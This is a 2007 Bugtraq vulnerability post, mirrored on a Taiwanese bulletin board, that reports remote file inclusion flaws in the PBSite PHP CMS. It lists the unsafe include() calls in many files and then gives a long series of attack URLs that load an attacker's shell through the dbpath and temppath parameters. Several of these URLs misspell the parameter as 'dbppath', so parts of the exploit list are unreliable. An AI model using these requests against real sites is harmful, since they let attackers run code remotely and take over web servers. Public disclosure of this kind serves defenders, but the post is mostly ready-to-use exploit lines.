閱讀文章 - 看板 Bugtraq - 批踢踢實業坊

發信人the-modest-pirate@hotmail.com ("pito pito"),

看板Bugtraq

標題PBSite - PHP Bulletin Site | CMS ====> RFI

發信站NCTU CSIE FreeBSD Server (Sat Jun 2 07:22:35 2007)

轉信站ptt!FreeBSD.csie.NCTU!not-for-mail

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% script:PBSite - PHP Bulletin Site | CMS ====> RFI url:http://sourceforge.net/project/showfiles.php?group_id=88114 authot:titanichacker (the-modest-pirate@hotmail.com) contact: hack-teach.com & mohandko.com & tryag.com %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% bug in: %%% %%%%%%%%%%% ../useronline.php include($dbpath."/settings.php"); include($temppath."/pb/language/lang_".$language.".php"); %%% ../ucp.php include($dbpath."/settings.php"); include($dbpath."/settings/styles/styles.php"); %%%%% ../setcookie.php include($temppath."/pb/language/lang_".$language.".php"); include($dbpath.'/settings.php'); %%%%%%%%%% ../sendpm.php include($dbpath."/settings.php"); %%%%%%%%%%% ../search.php include($dbpath."/settings.php"); include($dbpath."/settings/styles/styles.php"); include($temppath."/pb/language/lang_".$language.".php"); %%%%%%%%%% ../register.php include($dbpath."/settings.php"); include($dbpath."/settings/styles/styles.php"); include($temppath."/pb/language/lang_".$language.".php"); %%%%%%%%%%%% ../profile.php include($dbpath."/settings.php"); include($dbpath."/settings/styles/styles.php"); %%%%%%%%%%%%% ../post.php include($dbpath."/settings.php"); include($dbpath."/settings/styles/styles.php"); include($temppath."/pb/language/lang_".$language.".php"); include($temppath."/pb/language/lang_".$language.".php"); %%%%%%%%%%%% ../pmpshow.php include($dbpath."/settings.php"); include($dbpath."/settings/styles/styles.php"); %%%%%%%%%%%%% ../pm.php include($dbpath."/settings.php"); include($dbpath."/settings/styles/styles.php"); %%%%%%%%%%%% ../ntopic.php include($dbpath."/settings.php"); include($dbpath."/settings/styles/styles.php"); %%%%%%%%%%% ../nreply.php include($dbpath."/settings.php"); include($dbpath."/settings/styles/styles.php"); include($temppath."/pb/language/lang_".$language.".php"); include($temppath."/pb/language/lang_".$language.".php"); %%%%%%%%%% ../news.php include($dbpath."/settings.php"); include($dbpath."/settings/styles/styles.php"); include ($dbpath."/posts/".$cat."_".$fid."_".$pid); include($temppath."/pb/language/lang_".$language.".php"); %%%%%%%%%%%%% ../memberslist.php include($dbpath."/settings.php"); include($dbpath."/settings/styles/styles.php"); %%%%%%%%%%%%%%%% ../logout.php include($dbpath."/settings.php"); include($dbpath."/settings/styles/styles.php"); include ($dbpath."/posts/".$cat."_".$fid."_".$pid); include($temppath."/pb/language/lang_".$language.".php"); %%%%%%%%%%%%%%%% ../login.php include($dbpath."/settings.php"); include_once("$temppath/$template/language/lang_$language.php"); include_once("$temppath/$template/language/lang_$language.php"); %%%%%%%%%%%%%%%%%%%%%%%%% ../index.php include($dbpath."/settings.php"); include_once("$temppath/$template/language/lang_$language.php"); include_once("$temppath/$template/language/lang_$language.php"); %%%%%%%%%%%%%%%%% ../help.php include($dbpath."/settings.php"); include_once($dbpath."/settings/styles/styles.php"); include("$temppath/$template/language/lang_$language.php"); %%%%%%%%%%%%% ../forum.php include($dbpath."/settings.php"); include($temppath."/pb/language/lang_$language.php"); include($temppath."/pb/language/lang_".$language.".php"); %%%%%%%%%%%% ../error.php include($dbpath."/settings.php"); include($temppath."/pb/language/lang_$language.php"); include($temppath."/pb/language/lang_".$language.".php"); %%%%%%%%%%% ../editpost.php include($dbpath."/settings.php"); %%%%%%%%%%%% ../delpost.php include($dbpath."/settings.php"); %%%%%%%%%% ../delpm.php include($dbpath."/settings.php"); include("$temppath/pb/language/lang_$language.php"); %%%%%%%%%%%% ../confirm.php include($dbpath."/settings.php"); include($temppath."/pb/language/lang_".$language.".php"); %%%%%%%%%%%%% ../board.php include($dbpath."/settings.php"); include($temppath."/pb/language/lang_".$language.".php"); %%%%%%%%%%%%%%%% ../admin2.php include($dbpath."/settings.php"); %%%%%%%%%%%%%%%%%% ../admin.php include($dbpath."/settings.php"); include($dbpath."/settings/styles/styles.php"); %%%%%%%%%%%%%%%% ../templates/pb/css/formstyles.php include ($dbpath."/settings/styles/styles.php"); %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% exploit:%% %%%%%%%%% http://victim/path/useronline.php?dbpath=[shell] http://victim/path/useronline.php?temppath=[shell] %%%%% http://victim/path/ucp.php?dbpath=[shell] %%%%% http://victim/path/setcookie.php?temppath=[shell] http://victim/path/setcookie.php?dbppath=[shell] %%%%% http://victim/path/sendpm.php?dbppath=[shell] %%%%%%% http://victim/path/search.php?dbppath=[shell] http://victim/path/search.php?temppath=[shell] %%%%%%%%% http://victim/path/register.php?dbppath=[shell] http://victim/path/register.php?temppath=[shell] %%%%%%%%%% http://victim/path/profile.php?dbpath=[shell] %%%%%%%% http://victim/path/post.php?dbppath=[shell] http://victim/path/post.php?temppath=[shell] %%%%%%%%% http://victim/path/pmpshow.php?dbppath=[shell] %%%%%%%%%%% http://victim/path/pm.php?dbppath=[shell] %%%%%%%%%%%% http://victim/path/ntopic.php?dbppath=[shell] %%%%%%%% http://victim/path/nreply.php?dbppath=[shell] http://victim/path/nreply.php?temppath=[shell] %%%%%%%%%%%% http://victim/path/news.php?dbppath=[shell] http://victim/path/news.php?temppath=[shell] %%%%%%%%%%% http://victim/path/memberslist.php?dbppath=[shell] %%%%%%%%%%%%%% http://victim/path/logout.php?dbppath=[shell] http://victim/path/logout.php?temppath=[shell] %%%%%%%%%%%%%%%%%% http://victim/path/login.php?dbppath=[shell] http://victim/path/login.php?temppath=[shell] %%%%%%%%%%%%%%%%% http://victim/path/index.php?dbppath=[shell] http://victim/path/index.php?temppath=[shell] %%%%%%%%%%%%% http://victim/path/help.php?dbppath=[shell] http://victim/path/help.php?temppath=[shell] %%%%%%%%%% http://victim/path/forum.php?dbppath=[shell] http://victim/path/forum.php?temppath=[shell] %%%%%%%%%%% http://victim/path/error.php?dbppath=[shell] http://victim/path/error.php?temppath=[shell] %%%%%%%%%%% http://victim/path/editpost.php?dbppath=[shell] %%%%%%%%%% http://victim/path/delpost.php?dbppath=[shell] %%%%%%%%%%% http://victim/path/delpm.php?dbppath=[shell] http://victim/path/delpm.php?temppath=[shell] %%%%%%%%%%% http://victim/path/confirm.php?dbppath=[shell] http://victim/path/confirm.php?temppath=[shell] %%%%%%%%%%% http://victim/path/board.php?dbppath=[shell] http://victim/path/board.php?temppath=[shell] %%%%%%%%%%% http://victim/path/admin2.php?dbppath=[shell] %%%%%%%%%%% http://victim/path/admin.php?dbppath=[shell] %%%%%%%%%%%% http://victim/path/templates/pb/css/formstyles.php?dbpath=[shell] %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%% thanx %%%%%%%%% cold-zero & mohandko & tryag & arb-hawk & drbaka & kof2002 & milw0rm & xp10 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% _________________________________________________________________ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/